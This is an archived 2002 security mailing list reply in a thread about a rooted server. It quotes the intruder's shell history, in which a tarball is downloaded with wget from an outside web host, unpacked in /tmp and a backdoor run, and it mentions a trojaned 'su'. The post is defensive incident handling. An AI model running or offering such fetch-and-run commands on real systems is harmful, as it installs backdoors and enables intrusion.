Security Incidents mailing list archives
Re: Rooted, .haos on system
From: zeno <bugtraq () cgisecurity net>
Date: Mon, 16 Dec 2002 15:54:02 -0500 (EST)
Left in the .bash_history was this:
w
cd /tmp
wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
./epc
A quick check tells me that 'epc' is a backdoor utility, and the other
file contained within loc.tgz looks like a trojaned 'su'.
Maybe you should email this dude. He wrote the exploit (or so the exploit says) "su exploit by XP <xp () xtreme-power com> Enjoy! " Other neat stuff if you do a strings on the two filenames.
I've already notified Geocities abuse, and haven't heard back from them yet. i
The domain name resolves to http://www.djteckh.com/ maybe worth checking out.
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Rooted, .haos on system Damian Gerow (Dec 15)
- Re: Rooted, .haos on system Damian Gerow (Dec 16)
- Re: Rooted, .haos on system Damian Gerow (Dec 16)
- Re: Rooted, .haos on system Mike Katz (Dec 16)
- Re: Rooted, .haos on system zeno (Dec 16)
- Re: Rooted, .haos on system Carlos Eduardo Pedroza Santiviago (Dec 16)
- Re: Rooted, .haos on system Damian Gerow (Dec 16)
- Message not available
- Re: Rooted, .haos on system Julian Young (Dec 17)
- New CIFS (port 445) worm? David Gillett (Dec 17)
- Re: New CIFS (port 445) worm? Zen (Dec 17)
- Re: Rooted, .haos on system Damian Gerow (Dec 16)
- Re: Rooted, .haos on system Damian Gerow (Dec 16)
- Re: Rooted, .haos on system zeno (Dec 16)